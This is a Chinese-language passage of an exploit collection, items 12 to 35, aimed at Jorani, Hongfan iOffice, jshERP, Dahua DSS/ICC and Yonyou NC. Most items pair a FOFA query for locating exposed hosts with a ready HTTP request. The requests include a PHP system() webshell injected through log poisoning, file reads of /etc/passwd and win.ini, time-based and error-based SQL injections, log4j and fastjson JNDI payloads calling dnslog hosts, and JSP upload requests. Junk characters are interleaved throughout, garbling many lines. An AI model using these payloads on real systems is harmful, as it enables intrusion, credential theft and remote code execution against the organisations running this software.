Cache-Control: no-cache
( G, b: w) j% e- u; W5 vUpgrade-Insecure-Requests: 1
" w+ R: _$ r% V2 MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36, ^* b/ I d4 g+ i9 Z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
* y% L/ X6 S* T6 ZAccept-Encoding: gzip, deflate% D! _3 q+ ?/ E7 A \+ V: ?' b0 c
Accept-Language: zh-CN,zh;q=0.9,en;q=0.85 c4 i) |* e& S) q! N* \2 A) u
Connection: close
" d r6 |$ o8 }8 c- H/ G6 Y( ~! V; k' x. U; r1 o
# m) g, p B$ @$ X# U- W4 O: I12. Jorani < 1.0.2 远程命令执行: _% I$ h% C: }- I4 N- t+ q9 p
FOFA:title="Jorani"; c, z- G- D1 g9 t( e) E( Q6 b8 d' J
第一步先拿到cookie6 P% t- q l6 q4 a- {0 E
GET /session/login HTTP/1.1& N, o* j5 X: V) Q
Host: 192.168.190.308 D# \3 n4 e9 \+ l) N% S6 \
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.365 a$ {' S. Z7 b0 m
Connection: close2 R }1 k% d! U4 \
Accept-Encoding: gzip
" T& E( M6 Y) J) o+ i; o/ d
+ Z/ g% b1 h0 Y9 b, G7 R8 f/ r0 F7 F1 G7 J+ o# t6 g# k A6 b6 {
响应中csrf_cookie_jorani用于后续请求: Z* K1 P6 C1 A) b& |
HTTP/1.1 200 OK
2 X2 J" Z! J% C6 X6 gConnection: close4 i+ }; X; ]' {" ]3 f u
Cache-Control: no-store, no-cache, must-revalidate/ a1 R* X8 Q, i8 i" x) v
Content-Type: text/html; charset=UTF-8
4 F6 d; q* F ~) g3 ADate: Tue, 24 Oct 2023 09:34:28 GMT$ m) X$ m h* w" u9 z
Expires: Thu, 19 Nov 1981 08:52:00 GMT, f8 ^% x: d D' o, {& J V
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT. {7 ~! ~+ t6 Y5 r2 w
Pragma: no-cache
+ I6 t T+ Q/ P! `Server: Apache/2.4.54 (Debian)+ }+ f4 o0 \, h3 a
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
7 g! q8 {3 F& A7 c |4 mSet-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly: y( m3 O% {4 v! x
Vary: Accept-Encoding
2 C6 c! \0 p, q4 Z$ F* _+ O
! H" a9 E( Q5 }. n
7 a8 F8 ^; L, O0 K0 Z# JPOST请求,执行函数并进行base64编码0 V% F A: r3 z, }7 j$ s( f
POST /session/login HTTP/1.1
0 ?+ W: M! x1 V, wHost: 192.168.190.30* _2 S" u1 t6 _. F. Z. y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
* A K2 i9 j. Z$ t, }) AConnection: close
4 b. L5 {3 b G0 W( |Content-Length: 252
# k% t# \# v' ~* i- u% T6 f% ?9 gContent-Type: application/x-www-form-urlencoded$ N8 i; f1 g4 P" F+ E' n
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
7 o: R, r1 j0 T4 DAccept-Encoding: gzip5 P( Y* d) W& K- j
0 P$ i9 J( o" F
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor" ?4 Q7 l& u; E4 U6 D; d( T m
) y- s. [9 o' g3 N: C% L
& ]- c6 \; Y. _/ ~4 r( L% w6 z! t+ Y1 l. Z7 F
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串+ I+ Y# `0 W/ [ ^; s! N
GET /pages/view/log-2023-10-24 HTTP/1.1
) A' B" `* X+ p$ EHost: 192.168.190.307 r1 g- b4 e" F& H% s' C0 m5 ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
1 \9 G" n# K3 s' j$ Z) W; H% HConnection: close
2 Y9 x \0 X. h' j& A- YCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r2 p K3 S, c: a. w: m4 F6 b$ g
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
9 {* e) Z3 M7 p6 A5 k9 B$ NX-REQUESTED-WITH: XMLHttpRequest
/ z; C/ j& Y7 u0 {5 D. SAccept-Encoding: gzip7 {$ B, ^, K7 X5 `+ F; I- Z( \
& _, e7 F9 h0 y, m# V( y8 P
2 N+ L, {/ w) b2 A3 l# }
13. 红帆iOffice ioFileDown任意文件读取
) M% v4 P- f2 u7 A7 m& g% AFOFA:app="红帆-ioffice"
2 L d+ R5 n# p: ]6 r# T2 X0 ?* }7 x* vGET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1/ v# L7 W8 _( E( I7 B
Host: x.x.x.x
! r! S t I* \User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
; J8 q }3 b' V/ @% KConnection: close9 \. ~. D( E! z, }' E% i7 j
Accept: */*
- k( ]$ O& ?! hAccept-Encoding: gzip3 ~& u f7 X6 {
1 [/ I& w% x ?* j' j2 F
/ j" Z" c2 `9 R6 P- w- T14. 华夏ERP(jshERP)敏感信息泄露, P3 z, x+ D5 F2 }* _$ ^ U
FOFA:body="jshERP-boot"
' P8 J( R, W- x' y0 F3 J泄露内容包括用户名密码/ i7 g6 N: b; G1 s2 t; H
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1* T' q3 G: c% h. Q6 d
Host: x.x.x.x2 r+ Q. j ^* Q; x2 a- c- w
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
6 |* J; c( D. `- XConnection: close
) u z7 Q ?: W; P' _: s4 s; Z& }Accept: */*
* Q$ M9 [& q; h$ ] z& qAccept-Language: en
- ?5 z) V' t5 a+ s0 M- I; |Accept-Encoding: gzip
- v/ ~# ~, V9 L4 l+ {: V$ M; T" `
3 x# ^# W2 g) X& t, e+ k$ i: U
6 ]0 T3 r, @ C15. 华夏ERP getAllList信息泄露
; {+ I; [% q2 ]4 e- O0 {CVE-2024-0490
' I* {* r9 Y+ z+ t$ DFOFA:body="jshERP-boot"' { O# w* I5 B' M
泄露内容包括用户名密码
; W! q: u8 q& ?" ~$ t1 S) oGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1# ^3 p% `7 V1 Z" s! |4 D, A2 N) F8 K
Host: 192.168.40.130:100
; O/ m5 O% d3 C+ EUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.360 ^3 [" a6 x5 e: u! K
Connection: close4 i$ d: R. m% N9 F$ W) z- f
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
1 U. W7 G2 b9 h A1 LAccept-Language: en7 }! Q# K# a' L* I8 g
sec-ch-ua-platform: Windows
% K1 C% U, t( O% c, a! k5 |( _Accept-Encoding: gzip
5 ?& V: {: n V4 d% w" A6 z: X# v: d; H* w4 h0 V9 x
) O0 ?$ ^# y h' \+ p) ]16. 红帆HFOffice医微云SQL注入: |4 u+ v) l; H( [
FOFA:title="HFOffice"
" S2 Y3 b, B; d1 n& y* }, ]poc中调用函数计算1234的md5值
# z2 g. x/ ~% f8 [* E0 N4 QGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
+ k. E- J( B( J3 s4 f4 lHost: x.x.x.x
! |. _* s5 Y* }/ {1 nUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36) F) s) o$ J1 ^. P: t; `+ s# }
Connection: close
- p- n/ X3 T8 nAccept: */*
3 b* m% d, D7 ?- b3 L$ U: @Accept-Language: en
( _3 w* ?* M2 A R m0 }Accept-Encoding: gzip
3 B% l8 F; z: E3 X. j; {0 l' X, W. I' b
6 _' B( j1 X. V0 M% D4 t; D17. 大华 DSS itcBulletin SQL 注入0 S* ~+ Z- Y( j/ W+ \
FOFA:app="dahua-DSS"
7 J$ {5 [. g4 r8 [( SPOST /portal/services/itcBulletin?wsdl HTTP/1.1
' ]: P& v1 i% w3 Y4 Y8 THost: x.x.x.x8 J _8 r Q1 q$ R$ A8 [
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
% a' F0 I) ~' X; R2 UConnection: close
6 o; J# W0 z% @3 P$ E9 lContent-Length: 3455 B# w! J* m8 G7 U; _# F$ R
Accept-Encoding: gzip% g# J; A- V: _
% e4 }" J$ _8 H
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>" G6 i7 V$ u% ]4 I* ?# d
<s11:Body>
, C9 _% a" O2 \2 n: l: w( z; u <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
: U( L- }4 K# e! {& h5 D <netMarkings># K( l% k; s4 }3 M& K
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1! C! f- C# h. k/ b9 _0 X: a: A
</netMarkings>
, b4 c+ s: \/ M </ns1:deleteBulletin>- P+ b0 K9 e; C" J5 F3 q- W# ~
</s11:Body>
* `6 R# O2 s% T: O* u9 t8 G/ k' w7 u</s11:Envelope>+ i/ u: s s K2 C: F: S( C
7 }! n ^# F& a) @) Y5 v) d
+ M; ^) B7 X# |0 f7 y18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
- k# b" r4 \! w9 Z# `! T/ `# qFOFA:app="dahua-DSS"
; |- `& b2 i1 f0 ?: j4 @GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
+ B \6 J7 a: ]! W4 JHost: your-ip
* j; n5 e+ b6 I/ l# ^; }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
5 {$ ~$ ^# o7 T3 f$ P' V9 X% WAccept-Encoding: gzip, deflate# f9 N! n( e# p
Accept: */*8 L9 p' W- w' R, P
Connection: keep-alive
+ v) l4 x" n4 R
# k e) x1 ^9 M3 ^" X+ D/ K, s( F; N% `7 M- Q8 Y1 D9 C+ Z
1 ]0 i) ~. f+ I3 T7 q
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
1 X( W( B) x2 o* {! p$ FFOFA:app="dahua-DSS"
`5 s. V- c& y4 y% qGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
% m ~3 M+ y, W4 L* J' ~Host:
, |6 f) i! ^5 u. n. F. a6 CUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
' Y3 n2 k4 E5 r6 F4 yAccept-Encoding: gzip, deflate8 l& r' c- v' H0 W+ @* ^
Accept: */*
, S. v3 t) d' M! C9 A3 K( m oConnection: keep-alive
2 B9 m& j- U4 z1 ` o
" `( S: C9 B4 }9 s+ S9 R
* q) o; H( {/ x/ K' _5 U, w20. 大华ICC智能物联综合管理平台任意文件读取
( X' k% y5 F9 j/ o7 O" |FOFA:body="*客户端会小于800*"/ M8 B; r; F: C- u3 w' Y
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.11 w( C% n+ N# n2 I
Host: x.x.x.x3 c* n- C" U6 t' l! F
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36% p6 U4 n: y+ b
Connection: close1 ^! j& I( L4 D+ A- m
Accept: */*0 [. c+ w }2 i ]( j# u
Accept-Language: en
8 S' c e* b( |* o: g6 Z: eAccept-Encoding: gzip
. Q5 }8 x. h7 b6 |2 W/ j7 O3 n3 k: A4 f4 u7 P) z
# r3 A* A( n. _+ i! Y& O% Y21. 大华ICC智能物联综合管理平台random远程代码执行: Z- o0 }- e [0 w6 t5 `
FOFA:icon_hash="-1935899595"2 O% o3 {' T4 p$ k' d, X$ H7 j
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
. Q# z. U. E$ G" U- E5 ~1 \Host: x.x.x.x
# T3 }( Z" M# \* lUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
) ]+ y: J7 |4 lContent-Length: 161; T; K8 K0 c9 O3 o( L
Accept-Encoding: gzip0 i" C$ |5 [4 J: g* Q: V1 T
Connection: close4 u6 l: V4 R+ z2 a$ J
Content-Type: application/json;charset=utf-8* [; C! L2 C& Z' m+ e% k2 E3 S
7 v! A# Q0 o, n/ s3 L8 U9 ~4 U{
7 p* j3 q0 F) N& }, w* _' H# z"a":{
/ |/ m) T$ Z$ _. V" P8 k/ D9 s "@type":"com.alibaba.fastjson.JSONObject",2 P' U7 q. Y p/ m R
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}% e* u6 X% u+ _4 o# A" y
}""
4 a2 j- I: C3 T, N( O}
' h/ B; ~7 p Q, [9 v6 o4 J6 d3 V6 b4 b+ C( C' E) D) R3 S! \
: t2 x3 M% |4 X7 c/ g' T
22. 大华ICC智能物联综合管理平台 log4j远程代码执行2 p7 I d1 {5 Z( q6 n# n( _; G
FOFA:icon_hash="-1935899595"
/ J* L; q. m1 GPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.19 ~$ l0 \& \0 l7 ^$ ?% [- r
Host: your-ip
9 b( c# x' C+ t0 xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
* s0 \2 G# y5 v8 oContent-Type: application/json;charset=utf-8
2 W' e+ h ^* D( j: G3 v" R
/ t; G. s# q4 n8 G' m: O6 d( j{
9 x' Z7 d* }% M+ p"loginName":"${jndi:ldap://dnslog}"# _, ?1 S0 |2 [1 a2 ?4 K
}& [, \. a( t6 z4 }' z& O4 v% C6 V
$ B7 o/ g, m( t3 ~9 t
+ o* F6 C% {- q- z6 m& e
) V* J! N. O1 a; F+ R( Y23. 大华ICC智能物联综合管理平台 fastjson远程代码执行8 h/ ^; p! E0 T
FOFA:icon_hash="-1935899595"
- n3 f$ ~1 k. V0 E6 k5 _" D: nPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
s. V/ l: W! DHost: your-ip' ~$ f. G5 z& ]. D- q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15/ c( R- p2 Y4 O! W7 C9 v
Content-Type: application/json;charset=utf-8: g' Q8 M: W: ?0 i: h2 m
Accept-Encoding: gzip" x) N( Z I) }( f; [, R; j% N! X
Connection: close
/ \6 E! C$ u6 U9 j* v9 |: v0 q
, Q7 L( `8 i$ p9 N7 r{; h9 G" u0 Z0 D7 Y# ]
"a":{
9 w/ _+ o, R# l8 i "@type":"com.alibaba.fastjson.JSONObject",1 u' U- c" c' Y% }: K' n5 H% d
{"@type":"java.net.URL","val":"http://DNSLOG"}
) l. ~" R7 n. Q0 w$ Q }""! P, F& \1 J: ]3 i$ f6 c5 R1 A
}
2 R( K- x, s+ W& V/ B9 x: M7 k3 s/ s" D
, {( x8 F, R! n4 h7 ~
24. 用友NC 6.5 accept.jsp任意文件上传
0 b2 V. S0 t" u7 YFOFA:icon_hash="1085941792"/ E5 S' o* `5 z8 L
POST /aim/equipmap/accept.jsp HTTP/1.1
; t- ~! N9 y$ i; r- kHost: x.x.x.x
5 r8 p ^7 V+ q" ?User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.361 n; a: m5 \# ^2 E4 h+ t" N/ M7 v
Connection: close r& _ j& M8 j( z- Q! ~
Content-Length: 4495 f8 m7 p( e! L! s; g, B0 T
Accept: */*8 n# [: B* v4 f8 B' o
Accept-Encoding: gzip
6 T0 A, s& d8 d8 b' KContent-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc% I) K; j t) A8 v
3 y, K$ s# n, _. C- W& e-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc7 F( w% H6 W7 W' z* _; x' H+ T
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
+ U; F( [, W/ _' Z7 V. f Y6 {% ZContent-Type: text/plain! h7 x, G0 z, G' }
6 K! F2 I( j1 S' p$ G2 n% z+ y
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
7 a5 R7 q! D0 [' z2 q& B0 c-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc/ Q- o1 J- F) a! Q4 d
Content-Disposition: form-data; name="fname"
8 A7 R; o1 l. @& g7 `% U, D$ N
3 Z/ y" [8 @0 t! U1 Z* M. j4 M$ V M\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp% S3 c9 S+ K/ o& z" E. |
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
: D$ c/ E7 k9 h+ D; n0 W9 I
* b6 b- C: w& b# [9 _" y- i9 A( q# p3 g
25. 用友NC registerServlet JNDI 远程代码执行
' Y$ X9 G" ]+ F7 H% UFOFA:app="用友-UFIDA-NC"
) b# p8 n6 B2 ^1 H6 B0 n0 r& mPOST /portal/registerServlet HTTP/1.1( I1 B1 @) L* d4 O6 R% m- J
Host: your-ip
7 S' D/ X4 B2 y. X0 F9 F2 |# jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
" Q$ m! G0 c4 m. ?" }6 {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
+ B! @, a5 `' W0 P% U/ s8 GAccept-Encoding: gzip, deflate" n5 q7 w/ i2 n K0 F( e; `" P
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
* r' {8 A+ N* \7 YContent-Type: application/x-www-form-urlencoded2 L o a& n- l- O/ s
) j) {3 R0 D& q+ ?( E0 Y/ J
type=1&dsname=ldap://dnslog3 H. ^3 S+ T4 H {
# S0 L( E9 M' T5 s4 ]7 e4 ?; b
' p/ J9 N; I- h( _! p26. 用友NC linkVoucher SQL注入% G& |6 b7 B; v
FOFA:app="用友-UFIDA-NC"3 P* x; j! B% x$ s
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
$ X2 K2 `3 s0 n8 i# v. LHost: your-ip6 z; f, P' x) I0 Y0 x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36! x5 U7 K$ e1 h
Content-Type: application/x-www-form-urlencoded
, j# e- m& T# l. Z, w' ~( {2 XAccept-Encoding: gzip, deflate
N8 t" p b: K! X8 NAccept: */*
+ f- a9 S! q! v; O% SConnection: keep-alive4 T. w. m. G8 O! W0 c
! {! h; W$ E7 Y3 j0 x- M+ X
# f3 E1 N7 h1 m! x& A0 e27. 用友 NC showcontent SQL注入
. Q; w+ |5 F& \FOFA:icon_hash="1085941792"
7 e& q: z& z. k' j+ d0 Z! K. D. nGET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1( ?, U, V0 q( z. O* N
Host: your-ip; K5 Q# `7 ` D8 x+ i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
* v! M, u* q7 ^; V! H# k* H; zAccept-Encoding: identity
8 k! g+ e# e$ V) l; X, G% r+ x6 SConnection: close( Y- N3 j6 @7 N. Z
Content-Type: text/xml; charset=utf-8
# o3 T6 C3 Q1 n% L& a+ d* o# K
8 I3 U) V; S: j+ o& i( \# I7 c0 J
( F" ]& R9 N$ t3 k5 i2 ?0 U) `; s28. 用友NC grouptemplet 任意文件上传
, ~' k: B6 I, \( g2 CFOFA:icon_hash="1085941792"
% M0 W! F# C" oPOST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1/ a0 F' ]6 I7 L2 f. P- u& n3 V! F% L1 w
Host: x.x.x.x# h1 ~8 P' t% {" h, V: e6 j# S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
5 M J5 L: _* o, H T; LConnection: close
9 a( Z4 ]8 D* ]5 ?$ }) a( P! UContent-Length: 268
& h6 a/ i, @/ F0 ]4 c) H+ q, UContent-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk1 g' N" K1 j# n# Y
Accept-Encoding: gzip
0 o1 {& Q5 K6 B
% ^# z3 w2 Z1 ~0 n6 u: K- f Z------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
4 P- ~$ A9 U4 e% u7 ~$ tContent-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
( Q* |# q* Y+ e j. GContent-Type: application/octet-stream
( I0 o/ O$ j0 f+ K1 M% l9 v
% f7 W- _& u) i6 K# y N8 ]8 P7 r<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>1 r6 r8 i* ^0 B
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
/ P9 M h! m9 v6 }9 ?! A3 X- M" a( U
/ b" N- n& x! m4 Y# D3 O6 V8 u/uapim/static/pages/nc/head.jsp
" k. @9 P0 Y( A/ v. H5 v/ s, W' }
5 d6 F8 m1 e# s1 ^29. 用友NC down/bill SQL注入
0 E* @" B( C9 aFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"0 C+ Q$ u2 `0 L$ @' J
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.14 ]7 S1 _4 k# @# b. {( D
Host: your-ip
# a! ^/ |0 i; KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 |: P7 V/ r8 z# H. R* W% b% s
Content-Type: application/x-www-form-urlencoded* V" O5 W0 W$ c+ b8 j4 X
Accept-Encoding: gzip, deflate8 r/ @( H9 B4 B! k
Accept: */*
6 c, q6 u8 \0 \3 ?# TConnection: keep-alive
0 M6 V7 a5 S0 m: y
: [9 d2 E6 N! m3 W
+ ~& e+ H" h3 g$ F( G30. 用友NC importPml SQL注入
2 U+ w4 ?0 G9 ]+ U3 }6 Y1 G: _FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
! Q! a4 H% d; i2 |POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
7 Q+ ?9 m+ N: I$ J9 H; H1 QHost: your-ip
; N5 B; T/ C# j1 b' n: xContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V; o# {* b, G6 P( y& }7 x, M! g% J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
3 L4 |& @# I/ @0 G' l+ WConnection: close
* |4 Y5 u6 H' N. Y* R: p8 ?
! a% C" s6 b1 L0 v( z& Q. L------WebKitFormBoundaryH970hbttBhoCyj9V
7 M! d2 a: E. n5 Q) IContent-Disposition: form-data; name="Filedata"; filename="1.jpg"
- s5 B* `. o6 O1 t1 a( d4 l* G( `7 {Content-Type: image/jpeg- B$ D; E/ J* f* n1 d* H$ k
------WebKitFormBoundaryH970hbttBhoCyj9V--8 d: ~% N5 Y2 c, ]. T
0 y9 A* p# U4 B" z) D+ {
3 A+ Y3 P9 y7 N6 w# W
31. 用友NC runStateServlet SQL注入! i t8 H6 }+ ?
version<=6.5- y3 H t: R" g0 c: K# w
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
% o9 G5 f }1 k9 r- ^9 tGET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.18 p$ j% u1 X% t
Host: host
& E. n( z. K, h% _( w$ AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36" n5 {5 n% X4 e. J$ [
Content-Type: application/x-www-form-urlencoded- k- K- A9 k0 P' r8 d* r* D& h+ Z
* ^' j( }3 n9 \1 n3 B! d
. o% A$ N1 @% }' Z32. 用友NC complainbilldetail SQL注入
6 l( Q8 ~1 I% [version= NC633、NC65# O8 b! c. Z5 o- a2 ?8 ?
FOFA:app="用友-UFIDA-NC"
/ |- G1 p {, D. q/ uGET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
' v0 q" f7 ?1 f( t# G( ^Host: your-ip6 T+ i8 Y7 C# {8 I. X0 C- m( ~1 t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
" G$ K' n2 y, C. o, N( e [Content-Type: application/x-www-form-urlencoded: ~1 j" r2 Q! [% ^! f! J- |
Accept-Encoding: gzip, deflate
& T4 h+ o1 O4 w5 ^Accept: */*
% K K) ~' J4 X! c9 v8 E" iConnection: keep-alive
, v# k$ ^+ H3 ?# I6 J0 {3 y2 }# T) b7 ~% }8 X# o" O) _) ]; E
0 t1 g2 m5 J& h33. 用友NC downTax/download SQL注入
# D' J# d- S8 Q+ v+ Y+ ?' y& Dversion:NC6.5FOFA:app="用友-UFIDA-NC"/ e; K: }2 W7 d- D, R
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
1 ~2 Y8 H, W4 t& M- i& o% P% j& qHost: your-ip
* M3 U. V& h8 n w% _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 M: ^& r# N' W; S$ ^2 G/ rContent-Type: application/x-www-form-urlencoded
. u& d9 C3 e$ q8 [Accept-Encoding: gzip, deflate
G1 y7 L7 Y0 hAccept: */*; \% z4 \# ~" y3 D2 r. @3 h
Connection: keep-alive
! z4 @0 W, |6 ?1 i/ V# \$ Q& j5 c7 S* X% u- y9 }
+ b" T9 F- h1 G34. 用友NC warningDetailInfo接口SQL注入" K0 ^6 _9 h1 h
FOFA:app="用友-UFIDA-NC") \* V* E- n: g1 G* b
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1! ^$ e5 n" A+ N4 H' A3 c
Host: your-ip% y, U/ O; q2 _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
5 y z2 R3 _' D/ S: p' vContent-Type: application/x-www-form-urlencoded
8 [0 a7 d- _/ {/ h- J! o& MAccept-Encoding: gzip, deflate
* H+ r2 l8 ` v( x2 {( ~; M, XAccept: */*
( l: t. ~5 j& x5 oConnection: keep-alive& s7 H v- O6 R) f# g! y* {
4 e$ e- b4 C& u2 e8 e% Z
5 v9 o8 [3 t6 \ S35. 用友NC-Cloud importhttpscer任意文件上传
+ ^; e( A- b: }* s6 {* nFOFA:app="用友-NC-Cloud"5 w. q. K1 e* R7 {
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
